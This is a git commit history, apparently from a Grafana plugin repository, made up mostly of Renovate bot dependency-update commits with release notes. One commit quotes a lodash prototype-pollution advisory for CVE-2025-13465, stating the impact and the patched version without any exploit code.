e388bd7d085212d413ffe2da52fa41cc1ec1a994
191 Commits
| Author | SHA1 | Message | Date | |
|---|---|---|---|---|
renovate-sh-app[bot]
|
e388bd7d08 |
chore(deps): update dependency lodash to v4.17.23 [security] (#2236)
This PR contains the following updates:
| Package | Change |
[Age](https://docs.renovatebot.com/merge-confidence/) |
[Confidence](https://docs.renovatebot.com/merge-confidence/) |
|---|---|---|---|
| [lodash](https://lodash.com/)
([source](https://redirect.github.com/lodash/lodash)) | [`4.17.21` →
`4.17.23`](https://renovatebot.com/diffs/npm/lodash/4.17.21/4.17.23) |
|
|
### GitHub Vulnerability Alerts
####
[CVE-2025-13465](https://redirect.github.com/lodash/lodash/security/advisories/GHSA-xxjr-mmjv-4gpg)
### Impact
Lodash versions 4.0.0 through 4.17.22 are vulnerable to prototype
pollution in the `_.unset` and `_.omit` functions. An attacker can pass
crafted paths which cause Lodash to delete methods from global
prototypes.
The issue permits deletion of properties but does not allow overwriting
their original behavior.
### Patches
This issue is patched on 4.17.23.
---
### Lodash has Prototype Pollution Vulnerability in `_.unset` and
`_.omit` functions
[CVE-2025-13465](https://nvd.nist.gov/vuln/detail/CVE-2025-13465) /
[GHSA-xxjr-mmjv-4gpg](https://redirect.github.com/advisories/GHSA-xxjr-mmjv-4gpg)
<details>
<summary>More information</summary>
#### Details
##### Impact
Lodash versions 4.0.0 through 4.17.22 are vulnerable to prototype
pollution in the `_.unset` and `_.omit` functions. An attacker can pass
crafted paths which cause Lodash to delete methods from global
prototypes.
The issue permits deletion of properties but does not allow overwriting
their original behavior.
##### Patches
This issue is patched on 4.17.23.
#### Severity
- CVSS Score: 6.9 / 10 (Medium)
- Vector String:
`CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:L/SC:H/SI:H/SA:H/E:P`
#### References
-
[https://github.com/lodash/lodash/security/advisories/GHSA-xxjr-mmjv-4gpg](https://redirect.github.com/lodash/lodash/security/advisories/GHSA-xxjr-mmjv-4gpg)
-
[https://nvd.nist.gov/vuln/detail/CVE-2025-13465](https://nvd.nist.gov/vuln/detail/CVE-2025-13465)
-
[
|
||
|
renovate-sh-app[bot]
|
e88b15b32c |
chore(deps): update typescript-eslint monorepo to v8.53.0 (#2224)
This PR contains the following updates: | Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) | |---|---|---|---| | [@typescript-eslint/eslint-plugin](https://typescript-eslint.io/packages/eslint-plugin) ([source](https://redirect.github.com/typescript-eslint/typescript-eslint/tree/HEAD/packages/eslint-plugin)) | [`8.52.0` → `8.53.0`](https://renovatebot.com/diffs/npm/@typescript-eslint%2feslint-plugin/8.52.0/8.53.0) |  |  | | [@typescript-eslint/parser](https://typescript-eslint.io/packages/parser) ([source](https://redirect.github.com/typescript-eslint/typescript-eslint/tree/HEAD/packages/parser)) | [`8.52.0` → `8.53.0`](https://renovatebot.com/diffs/npm/@typescript-eslint%2fparser/8.52.0/8.53.0) |  |  | --- ### Release Notes <details> <summary>typescript-eslint/typescript-eslint (@​typescript-eslint/eslint-plugin)</summary> ### [`v8.53.0`](https://redirect.github.com/typescript-eslint/typescript-eslint/blob/HEAD/packages/eslint-plugin/CHANGELOG.md#8530-2026-01-12) [Compare Source](https://redirect.github.com/typescript-eslint/typescript-eslint/compare/v8.52.0...v8.53.0) ##### 🚀 Features - **eslint-plugin:** add rule \[strict-void-return] ([#​9707](https://redirect.github.com/typescript-eslint/typescript-eslint/pull/9707)) - **eslint-plugin:** \[no-unused-vars] add a fixer to remove unused imports ([#​11922](https://redirect.github.com/typescript-eslint/typescript-eslint/pull/11922)) ##### 🩹 Fixes - **eslint-plugin:** \[no-useless-default-assignment] fix false positive for parameters corresponding to a rest parameter ([#​11916](https://redirect.github.com/typescript-eslint/typescript-eslint/pull/11916)) - **eslint-plugin:** replace unclear "`error` typed" with more helpful description ([#​11704](https://redirect.github.com/typescript-eslint/typescript-eslint/pull/11704)) - **typescript-estree:** forbid invalid `extends` and `implements` in interface declaration ([#​11935](https://redirect.github.com/typescript-eslint/typescript-eslint/pull/11935)) - **typescript-estree:** forbid invalid class implements ([#​11934](https://redirect.github.com/typescript-eslint/typescript-eslint/pull/11934)) - **typescript-estree:** forbid type-only import with both default and named specifiers ([#​11930](https://redirect.github.com/typescript-eslint/typescript-eslint/pull/11930)) ##### ❤️ Thank You - Brad Zacher [@​bradzacher](https://redirect.github.com/bradzacher) - fisker Cheung [@​fisker](https://redirect.github.com/fisker) - Josh Goldberg - Josh Goldberg ✨ - Kirk Waiblinger - Niki [@​phaux](https://redirect.github.com/phaux) - Nikita - SungHyun627 [@​SungHyun627](https://redirect.github.com/SungHyun627) - Will Harney [@​wjhsf](https://redirect.github.com/wjhsf) You can read about our [versioning strategy](https://typescript-eslint.io/users/versioning) and [releases](https://typescript-eslint.io/users/releases) on our website. </details> <details> <summary>typescript-eslint/typescript-eslint (@​typescript-eslint/parser)</summary> ### [`v8.53.0`](https://redirect.github.com/typescript-eslint/typescript-eslint/blob/HEAD/packages/parser/CHANGELOG.md#8530-2026-01-12) [Compare Source](https://redirect.github.com/typescript-eslint/typescript-eslint/compare/v8.52.0...v8.53.0) This was a version bump only for parser to align it with other projects, there were no code changes. You can read about our [versioning strategy](https://typescript-eslint.io/users/versioning) and [releases](https://typescript-eslint.io/users/releases) on our website. </details> --- ### Configuration 📅 **Schedule**: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined). 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about these updates again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- ## Need help? You can ask for more help in the following Slack channel: #proj-renovate-self-hosted. In that channel you can also find ADR and FAQ docs in the Resources section. <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0Mi44Mi4zIiwidXBkYXRlZEluVmVyIjoiNDIuODIuMyIsInRhcmdldEJyYW5jaCI6Im1haW4iLCJsYWJlbHMiOlsidXBkYXRlLW1pbm9yIl19--> Signed-off-by: renovate-sh-app[bot] <219655108+renovate-sh-app[bot]@users.noreply.github.com> Co-authored-by: renovate-sh-app[bot] <219655108+renovate-sh-app[bot]@users.noreply.github.com> |
||
|
renovate-sh-app[bot]
|
ef773399c6 |
chore(deps): update dependency eslint-plugin-jsdoc to v62.1.0 (#2231)
This PR contains the following updates:
| Package | Change |
[Age](https://docs.renovatebot.com/merge-confidence/) |
[Confidence](https://docs.renovatebot.com/merge-confidence/) |
|---|---|---|---|
|
[eslint-plugin-jsdoc](https://redirect.github.com/gajus/eslint-plugin-jsdoc)
| [`62.0.1` →
`62.1.0`](https://renovatebot.com/diffs/npm/eslint-plugin-jsdoc/62.0.1/62.1.0)
|
|
|
---
### Release Notes
<details>
<summary>gajus/eslint-plugin-jsdoc (eslint-plugin-jsdoc)</summary>
###
[`v62.1.0`](https://redirect.github.com/gajus/eslint-plugin-jsdoc/releases/tag/v62.1.0)
[Compare
Source](https://redirect.github.com/gajus/eslint-plugin-jsdoc/compare/v62.0.1...v62.1.0)
##### Features
- update comment-parser; fixes
[#​1116](https://redirect.github.com/gajus/eslint-plugin-jsdoc/issues/1116)
; fixes
[#​1348](https://redirect.github.com/gajus/eslint-plugin-jsdoc/issues/1348)
([0170773](
|
||
|
renovate-sh-app[bot]
|
c96155c4a1 |
chore(deps): update dependency eslint-plugin-jsdoc to v62.0.1 (#2230)
This PR contains the following updates:
| Package | Change |
[Age](https://docs.renovatebot.com/merge-confidence/) |
[Confidence](https://docs.renovatebot.com/merge-confidence/) |
|---|---|---|---|
|
[eslint-plugin-jsdoc](https://redirect.github.com/gajus/eslint-plugin-jsdoc)
| [`62.0.0` →
`62.0.1`](https://renovatebot.com/diffs/npm/eslint-plugin-jsdoc/62.0.0/62.0.1)
|
|
|
---
### Release Notes
<details>
<summary>gajus/eslint-plugin-jsdoc (eslint-plugin-jsdoc)</summary>
###
[`v62.0.1`](https://redirect.github.com/gajus/eslint-plugin-jsdoc/releases/tag/v62.0.1)
[Compare
Source](https://redirect.github.com/gajus/eslint-plugin-jsdoc/compare/v62.0.0...v62.0.1)
##### Bug Fixes
- **`require-template`:** treat infer statement types as defined; fixes
[#​1628](https://redirect.github.com/gajus/eslint-plugin-jsdoc/issues/1628)
([e63dc23](
|
||
|
renovate-sh-app[bot]
|
64c73445d2 |
chore(deps): update dependency @babel/core to v7.28.6 (#2216)
This PR contains the following updates: | Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) | |---|---|---|---| | [@babel/core](https://babel.dev/docs/en/next/babel-core) ([source](https://redirect.github.com/babel/babel/tree/HEAD/packages/babel-core)) | [`7.28.5` → `7.28.6`](https://renovatebot.com/diffs/npm/@babel%2fcore/7.28.5/7.28.6) |  |  | --- ### Release Notes <details> <summary>babel/babel (@​babel/core)</summary> ### [`v7.28.6`](https://redirect.github.com/babel/babel/releases/tag/v7.28.6) [Compare Source](https://redirect.github.com/babel/babel/compare/v7.28.5...v7.28.6) #### v7.28.6 (2026-01-12) Thanks [@​kadhirash](https://redirect.github.com/kadhirash) and [@​kolvian](https://redirect.github.com/kolvian) for your first PRs! ##### 🐛 Bug Fix - `babel-cli`, `babel-code-frame`, `babel-core`, `babel-helper-check-duplicate-nodes`, `babel-helper-fixtures`, `babel-helper-plugin-utils`, `babel-node`, `babel-plugin-transform-flow-comments`, `babel-plugin-transform-modules-commonjs`, `babel-plugin-transform-property-mutators`, `babel-preset-env`, `babel-traverse`, `babel-types` - [#​17589](https://redirect.github.com/babel/babel/pull/17589) Improve Unicode handling in code-frame tokenizer ([@​JLHwung](https://redirect.github.com/JLHwung)) - `babel-plugin-transform-regenerator` - [#​17556](https://redirect.github.com/babel/babel/pull/17556) fix: `transform-regenerator` correctly handles scope ([@​liuxingbaoyu](https://redirect.github.com/liuxingbaoyu)) - `babel-plugin-transform-react-jsx` - [#​17538](https://redirect.github.com/babel/babel/pull/17538) fix: Keep jsx comments ([@​liuxingbaoyu](https://redirect.github.com/liuxingbaoyu)) ##### :nail\_care: Polish - `babel-core`, `babel-standalone` - [#​17606](https://redirect.github.com/babel/babel/pull/17606) Polish(standalone): improve message on invalid preset/plugin ([@​JLHwung](https://redirect.github.com/JLHwung)) ##### 🏠 Internal - `babel-plugin-bugfix-v8-static-class-fields-redefine-readonly`, `babel-plugin-proposal-decorators`, `babel-plugin-proposal-import-attributes-to-assertions`, `babel-plugin-proposal-import-wasm-source`, `babel-plugin-syntax-async-do-expressions`, `babel-plugin-syntax-decorators`, `babel-plugin-syntax-destructuring-private`, `babel-plugin-syntax-do-expressions`, `babel-plugin-syntax-explicit-resource-management`, `babel-plugin-syntax-export-default-from`, `babel-plugin-syntax-flow`, `babel-plugin-syntax-function-bind`, `babel-plugin-syntax-function-sent`, `babel-plugin-syntax-import-assertions`, `babel-plugin-syntax-import-attributes`, `babel-plugin-syntax-import-defer`, `babel-plugin-syntax-import-source`, `babel-plugin-syntax-jsx`, `babel-plugin-syntax-module-blocks`, `babel-plugin-syntax-optional-chaining-assign`, `babel-plugin-syntax-partial-application`, `babel-plugin-syntax-pipeline-operator`, `babel-plugin-syntax-throw-expressions`, `babel-plugin-syntax-typescript`, `babel-plugin-transform-async-generator-functions`, `babel-plugin-transform-async-to-generator`, `babel-plugin-transform-class-properties`, `babel-plugin-transform-class-static-block`, `babel-plugin-transform-dotall-regex`, `babel-plugin-transform-duplicate-named-capturing-groups-regex`, `babel-plugin-transform-explicit-resource-management`, `babel-plugin-transform-exponentiation-operator`, `babel-plugin-transform-json-strings`, `babel-plugin-transform-logical-assignment-operators`, `babel-plugin-transform-nullish-coalescing-operator`, `babel-plugin-transform-numeric-separator`, `babel-plugin-transform-object-rest-spread`, `babel-plugin-transform-optional-catch-binding`, `babel-plugin-transform-optional-chaining`, `babel-plugin-transform-private-methods`, `babel-plugin-transform-private-property-in-object`, `babel-plugin-transform-regexp-modifiers`, `babel-plugin-transform-unicode-property-regex`, `babel-plugin-transform-unicode-sets-regex` - [#​17580](https://redirect.github.com/babel/babel/pull/17580) Allow Babel 8 in compatible Babel 7 plugins ([@​nicolo-ribaudo](https://redirect.github.com/nicolo-ribaudo)) ##### :running\_woman: Performance - `babel-plugin-transform-react-jsx` - [#​17555](https://redirect.github.com/babel/babel/pull/17555) perf: Use lighter traversal for jsx `__source,__self` ([@​liuxingbaoyu](https://redirect.github.com/liuxingbaoyu)) ##### Committers: 7 - Babel Bot ([@​babel-bot](https://redirect.github.com/babel-bot)) - Eliot Pontarelli ([@​kolvian](https://redirect.github.com/kolvian)) - Huáng Jùnliàng ([@​JLHwung](https://redirect.github.com/JLHwung)) - Kadhirash Sivakumar ([@​kadhirash](https://redirect.github.com/kadhirash)) - Nicolò Ribaudo ([@​nicolo-ribaudo](https://redirect.github.com/nicolo-ribaudo)) - [@​liuxingbaoyu](https://redirect.github.com/liuxingbaoyu) - coderaiser ([@​coderaiser](https://redirect.github.com/coderaiser)) </details> --- ### Configuration 📅 **Schedule**: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined). 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- ## Need help? You can ask for more help in the following Slack channel: #proj-renovate-self-hosted. In that channel you can also find ADR and FAQ docs in the Resources section. <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0Mi44Mi4zIiwidXBkYXRlZEluVmVyIjoiNDIuODIuMyIsInRhcmdldEJyYW5jaCI6Im1haW4iLCJsYWJlbHMiOlsidXBkYXRlLXBhdGNoIl19--> Signed-off-by: renovate-sh-app[bot] <219655108+renovate-sh-app[bot]@users.noreply.github.com> Co-authored-by: renovate-sh-app[bot] <219655108+renovate-sh-app[bot]@users.noreply.github.com> |
||
|
renovate-sh-app[bot]
|
f511ec060e |
chore(deps): update dependency @grafana/plugin-e2e to v3.1.2 (#2217)
This PR contains the following updates: | Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) | |---|---|---|---| | [@grafana/plugin-e2e](https://redirect.github.com/grafana/plugin-tools) ([source](https://redirect.github.com/grafana/plugin-tools/tree/HEAD/packages/plugin-e2e)) | [`3.1.1` → `3.1.2`](https://renovatebot.com/diffs/npm/@grafana%2fplugin-e2e/3.1.1/3.1.2) |  |  | --- ### Release Notes <details> <summary>grafana/plugin-tools (@​grafana/plugin-e2e)</summary> ### [`v3.1.2`](https://redirect.github.com/grafana/plugin-tools/compare/@grafana/plugin-e2e@3.1.1...@grafana/plugin-e2e@3.1.2) [Compare Source](https://redirect.github.com/grafana/plugin-tools/compare/@grafana/plugin-e2e@3.1.1...@grafana/plugin-e2e@3.1.2) </details> --- ### Configuration 📅 **Schedule**: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined). 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- ## Need help? You can ask for more help in the following Slack channel: #proj-renovate-self-hosted. In that channel you can also find ADR and FAQ docs in the Resources section. <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0Mi44Mi4zIiwidXBkYXRlZEluVmVyIjoiNDIuODIuMyIsInRhcmdldEJyYW5jaCI6Im1haW4iLCJsYWJlbHMiOlsidXBkYXRlLXBhdGNoIl19--> Signed-off-by: renovate-sh-app[bot] <219655108+renovate-sh-app[bot]@users.noreply.github.com> Co-authored-by: renovate-sh-app[bot] <219655108+renovate-sh-app[bot]@users.noreply.github.com> |
||
|
renovate-sh-app[bot]
|
092e1c6014 |
chore(deps): update dependency eslint-plugin-prettier to v5.5.5 (#2218)
This PR contains the following updates: | Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) | |---|---|---|---| | [eslint-plugin-prettier](https://redirect.github.com/prettier/eslint-plugin-prettier) | [`5.5.4` → `5.5.5`](https://renovatebot.com/diffs/npm/eslint-plugin-prettier/5.5.4/5.5.5) |  |  | --- ### Release Notes <details> <summary>prettier/eslint-plugin-prettier (eslint-plugin-prettier)</summary> ### [`v5.5.5`](https://redirect.github.com/prettier/eslint-plugin-prettier/blob/HEAD/CHANGELOG.md#555) [Compare Source](https://redirect.github.com/prettier/eslint-plugin-prettier/compare/v5.5.4...v5.5.5) ##### Patch Changes - [#​772](https://redirect.github.com/prettier/eslint-plugin-prettier/pull/772) [`7264ed0`]( |
||
|
renovate-sh-app[bot]
|
a05b93314d |
chore(deps): update dependency swc-loader to v0.2.7 (#2219)
This PR contains the following updates: | Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) | |---|---|---|---| | [swc-loader](https://redirect.github.com/swc-project/pkgs) | [`0.2.6` → `0.2.7`](https://renovatebot.com/diffs/npm/swc-loader/0.2.6/0.2.7) |  |  | --- ### Configuration 📅 **Schedule**: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined). 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- ## Need help? You can ask for more help in the following Slack channel: #proj-renovate-self-hosted. In that channel you can also find ADR and FAQ docs in the Resources section. <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0Mi44Mi4zIiwidXBkYXRlZEluVmVyIjoiNDIuODIuMyIsInRhcmdldEJyYW5jaCI6Im1haW4iLCJsYWJlbHMiOlsidXBkYXRlLXBhdGNoIl19--> Signed-off-by: renovate-sh-app[bot] <219655108+renovate-sh-app[bot]@users.noreply.github.com> Co-authored-by: renovate-sh-app[bot] <219655108+renovate-sh-app[bot]@users.noreply.github.com> |
||
|
renovate-sh-app[bot]
|
b56f9e7ebb |
chore(deps): update dependency cspell to v9.6.0 (#2221)
This PR contains the following updates: | Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) | |---|---|---|---| | [cspell](https://cspell.org/) ([source](https://redirect.github.com/streetsidesoftware/cspell/tree/HEAD/packages/cspell)) | [`9.4.0` → `9.6.0`](https://renovatebot.com/diffs/npm/cspell/9.4.0/9.6.0) |  |  | --- ### Release Notes <details> <summary>streetsidesoftware/cspell (cspell)</summary> ### [`v9.6.0`](https://redirect.github.com/streetsidesoftware/cspell/blob/HEAD/packages/cspell/CHANGELOG.md#v960-2026-01-12) [Compare Source](https://redirect.github.com/streetsidesoftware/cspell/compare/v9.4.0...v9.6.0) ##### Features <details> <summary>feat: ESLint-plugin -- Distinguish between Forbidden, Misspelled, and Unknown words. (<a href="https://redirect.github.com/streetsidesoftware/cspell/pull/8337">#​8337</a>)</summary> ##### feat: ESLint-plugin -- Distinguish between Forbidden, Misspelled, and Unknown words. ([#​8337](https://redirect.github.com/streetsidesoftware/cspell/pull/8337)) </details> --- ### Configuration 📅 **Schedule**: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined). 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- ## Need help? You can ask for more help in the following Slack channel: #proj-renovate-self-hosted. In that channel you can also find ADR and FAQ docs in the Resources section. <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0Mi44Mi4zIiwidXBkYXRlZEluVmVyIjoiNDIuODIuMyIsInRhcmdldEJyYW5jaCI6Im1haW4iLCJsYWJlbHMiOlsidXBkYXRlLW1pbm9yIl19--> Signed-off-by: renovate-sh-app[bot] <219655108+renovate-sh-app[bot]@users.noreply.github.com> Co-authored-by: renovate-sh-app[bot] <219655108+renovate-sh-app[bot]@users.noreply.github.com> |
||
|
renovate-sh-app[bot]
|
97aeabed61 |
chore(deps): update dependency mini-css-extract-plugin to v2.10.0 (#2222)
This PR contains the following updates: | Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) | |---|---|---|---| | [mini-css-extract-plugin](https://redirect.github.com/webpack/mini-css-extract-plugin) | [`2.9.4` → `2.10.0`](https://renovatebot.com/diffs/npm/mini-css-extract-plugin/2.9.4/2.10.0) |  |  | --- ### Release Notes <details> <summary>webpack/mini-css-extract-plugin (mini-css-extract-plugin)</summary> ### [`v2.10.0`](https://redirect.github.com/webpack/mini-css-extract-plugin/blob/HEAD/CHANGELOG.md#2100-2026-01-16) [Compare Source](https://redirect.github.com/webpack/mini-css-extract-plugin/compare/v2.9.4...v2.10.0) ##### Features - respect `output.cssFilename` and `output.cssChunkFilename` ([#​1151](https://redirect.github.com/webpack/mini-css-extract-plugin/issues/1151)) ([54f775d]( |
||
|
renovate-sh-app[bot]
|
eecde20d39 |
chore(deps): update dependency prettier to v3.8.0 (#2223)
This PR contains the following updates: | Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) | |---|---|---|---| | [prettier](https://prettier.io) ([source](https://redirect.github.com/prettier/prettier)) | [`3.7.4` → `3.8.0`](https://renovatebot.com/diffs/npm/prettier/3.7.4/3.8.0) |  |  | --- ### Release Notes <details> <summary>prettier/prettier (prettier)</summary> ### [`v3.8.0`](https://redirect.github.com/prettier/prettier/blob/HEAD/CHANGELOG.md#380) [Compare Source](https://redirect.github.com/prettier/prettier/compare/3.7.4...3.8.0) [diff](https://redirect.github.com/prettier/prettier/compare/3.7.4...3.8.0) 🔗 [Release Notes](https://prettier.io/blog/2026/01/14/3.8.0) </details> --- ### Configuration 📅 **Schedule**: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined). 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- ## Need help? You can ask for more help in the following Slack channel: #proj-renovate-self-hosted. In that channel you can also find ADR and FAQ docs in the Resources section. <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0Mi44Mi4zIiwidXBkYXRlZEluVmVyIjoiNDIuODIuMyIsInRhcmdldEJyYW5jaCI6Im1haW4iLCJsYWJlbHMiOlsidXBkYXRlLW1pbm9yIl19--> Signed-off-by: renovate-sh-app[bot] <219655108+renovate-sh-app[bot]@users.noreply.github.com> Co-authored-by: renovate-sh-app[bot] <219655108+renovate-sh-app[bot]@users.noreply.github.com> |
||
|
renovate-sh-app[bot]
|
56a06171ec |
chore(deps): update dependency @types/node to v25.0.9 (#2196)
This PR contains the following updates: | Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) | |---|---|---|---| | [@types/node](https://redirect.github.com/DefinitelyTyped/DefinitelyTyped/tree/master/types/node) ([source](https://redirect.github.com/DefinitelyTyped/DefinitelyTyped/tree/HEAD/types/node)) | [`25.0.5` → `25.0.9`](https://renovatebot.com/diffs/npm/@types%2fnode/25.0.5/25.0.9) |  |  | --- ### Configuration 📅 **Schedule**: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined). 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- ## Need help? You can ask for more help in the following Slack channel: #proj-renovate-self-hosted. In that channel you can also find ADR and FAQ docs in the Resources section. <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0Mi42NC4xIiwidXBkYXRlZEluVmVyIjoiNDIuNjQuMSIsInRhcmdldEJyYW5jaCI6Im1haW4iLCJsYWJlbHMiOlsidXBkYXRlLXBhdGNoIl19--> Signed-off-by: renovate-sh-app[bot] <219655108+renovate-sh-app[bot]@users.noreply.github.com> Co-authored-by: renovate-sh-app[bot] <219655108+renovate-sh-app[bot]@users.noreply.github.com> Co-authored-by: yesoreyeram <153843+yesoreyeram@users.noreply.github.com> |
||
|
renovate-sh-app[bot]
|
0a1121ed73 |
chore(deps): update dependency @types/lodash to v4.17.23 (#2195)
This PR contains the following updates: | Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) | |---|---|---|---| | [@types/lodash](https://redirect.github.com/DefinitelyTyped/DefinitelyTyped/tree/master/types/lodash) ([source](https://redirect.github.com/DefinitelyTyped/DefinitelyTyped/tree/HEAD/types/lodash)) | [`4.17.22` → `4.17.23`](https://renovatebot.com/diffs/npm/@types%2flodash/4.17.22/4.17.23) |  |  | --- ### Configuration 📅 **Schedule**: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined). 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- ## Need help? You can ask for more help in the following Slack channel: #proj-renovate-self-hosted. In that channel you can also find ADR and FAQ docs in the Resources section. <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0Mi42NC4xIiwidXBkYXRlZEluVmVyIjoiNDIuNjQuMSIsInRhcmdldEJyYW5jaCI6Im1haW4iLCJsYWJlbHMiOlsidXBkYXRlLXBhdGNoIl19--> Signed-off-by: renovate-sh-app[bot] <219655108+renovate-sh-app[bot]@users.noreply.github.com> Co-authored-by: renovate-sh-app[bot] <219655108+renovate-sh-app[bot]@users.noreply.github.com> |
||
Jocelyn Collado-Kuri
|
5cac1b9b18 |
Release 6.1.1 (#2201)
Bug fixes for 6.1.0 --------- Co-authored-by: ismail simsek <ismailsimsek09@gmail.com> |
||
Zoltán Bedi
|
4e6a75c93d | Release 6.1.0 (#2194) | ||
|
renovate-sh-app[bot]
|
ffe5c44960 |
chore(deps): update dependency @types/node to v25.0.5 (#2189)
This PR contains the following updates: | Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) | |---|---|---|---| | [@types/node](https://redirect.github.com/DefinitelyTyped/DefinitelyTyped/tree/master/types/node) ([source](https://redirect.github.com/DefinitelyTyped/DefinitelyTyped/tree/HEAD/types/node)) | [`25.0.3` → `25.0.5`](https://renovatebot.com/diffs/npm/@types%2fnode/25.0.3/25.0.5) |  |  | --- ### Configuration 📅 **Schedule**: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined). 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- ## Need help? You can ask for more help in the following Slack channel: #proj-renovate-self-hosted. In that channel you can also find ADR and FAQ docs in the Resources section. <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0Mi42NC4xIiwidXBkYXRlZEluVmVyIjoiNDIuNjQuMSIsInRhcmdldEJyYW5jaCI6Im1haW4iLCJsYWJlbHMiOlsidXBkYXRlLXBhdGNoIl19--> Signed-off-by: renovate-sh-app[bot] <219655108+renovate-sh-app[bot]@users.noreply.github.com> Co-authored-by: renovate-sh-app[bot] <219655108+renovate-sh-app[bot]@users.noreply.github.com> |
||
|
renovate-sh-app[bot]
|
c1dec23e3c |
chore(deps): update dependency @types/lodash to v4.17.22 (#2193)
This PR contains the following updates: | Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) | |---|---|---|---| | [@types/lodash](https://redirect.github.com/DefinitelyTyped/DefinitelyTyped/tree/master/types/lodash) ([source](https://redirect.github.com/DefinitelyTyped/DefinitelyTyped/tree/HEAD/types/lodash)) | [`4.17.21` → `4.17.22`](https://renovatebot.com/diffs/npm/@types%2flodash/4.17.21/4.17.22) |  |  | --- ### Configuration 📅 **Schedule**: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined). 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- ## Need help? You can ask for more help in the following Slack channel: #proj-renovate-self-hosted. In that channel you can also find ADR and FAQ docs in the Resources section. <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0Mi42NC4xIiwidXBkYXRlZEluVmVyIjoiNDIuNjQuMSIsInRhcmdldEJyYW5jaCI6Im1haW4iLCJsYWJlbHMiOlsidXBkYXRlLXBhdGNoIl19--> Signed-off-by: renovate-sh-app[bot] 